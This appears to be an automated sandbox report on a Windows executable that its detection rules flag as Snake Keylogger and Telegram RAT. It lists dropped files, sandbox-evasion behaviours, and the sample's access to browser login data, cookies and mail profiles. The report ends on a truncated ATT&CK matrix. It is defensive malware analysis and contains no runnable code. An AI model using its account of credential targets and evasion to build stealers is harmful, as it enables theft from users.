            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Fiskefarsens89.volJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\banaleres.iniJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\engagerede.halJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\KonomimnstreJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Konomimnstre\evoe.kraJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Konomimnstre\provostry.txtJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Konomimnstre\retrograde.iniJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeAPI/Special instruction interceptor: Address: 590437B
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeAPI/Special instruction interceptor: Address: 45A437B
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeMemory allocated: 7660000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeMemory allocated: 38090000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeMemory allocated: 37EB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp8FE4.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe TID: 8296Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe TID: 8296Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405475
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_0040264F FindFirstFileA,12_2_0040264F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,12_2_00405475
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_00405E9C FindFirstFileA,FindClose,12_2_00405E9C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeAPI call chain: ExitProcess graph end nodegraph_0-3734
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeAPI call chain: ExitProcess graph end nodegraph_0-3893
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040310B
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EC3
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess created: C:\Users\user\Desktop\axN56TZ3PI.exe "C:\Users\user\Desktop\axN56TZ3PI.exe"Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeQueries volume information: C:\Users\user\Desktop\axN56TZ3PI.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00405BBA GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405BBA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000000C.00000002.6015919161.0000000038091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 0000000C.00000002.6015919161.00000000381D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: axN56TZ3PI.exe PID: 8888, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: axN56TZ3PI.exe PID: 8888, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000000C.00000002.6015919161.0000000038091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 0000000C.00000002.6015919161.00000000381D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: axN56TZ3PI.exe PID: 8888, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            Registry Run Keys / Startup Folder            		11
            Process Injection            		11
            Masquerading            		1
            OS Credential Dumping            		11
